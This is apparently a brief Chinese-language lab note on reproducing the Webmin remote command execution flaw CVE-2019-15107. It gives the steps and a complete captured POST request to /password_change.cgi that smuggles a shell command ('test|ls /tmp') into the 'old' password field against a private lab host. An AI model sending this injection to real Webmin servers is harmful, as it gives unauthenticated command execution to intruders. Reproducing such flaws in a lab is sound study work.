Webmin远程命令执行漏洞（CVE-2019-15107）.md

Webmin远程命令执行漏洞（CVE-2019-15107）

查了一下，发现webmin的cve挺多的

打开网址

出现这个

随便输个账号密码然后抓包

抓取数据包，修改数据，利用poc进行验证

POST /password_change.cgi HTTP/1.1 
Host: 192.168.1.190:13619 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 65 
Origin: https://192.168.1.190:13619 Connection: close Referer: https://192.168.1.190:13619/ 
Cookie: redirect=1; testing=1 
Upgrade-Insecure-Requests: 1 user=rootxx&pam=&expired=2&old=test|ls /tmp&new1=test2&new2=test2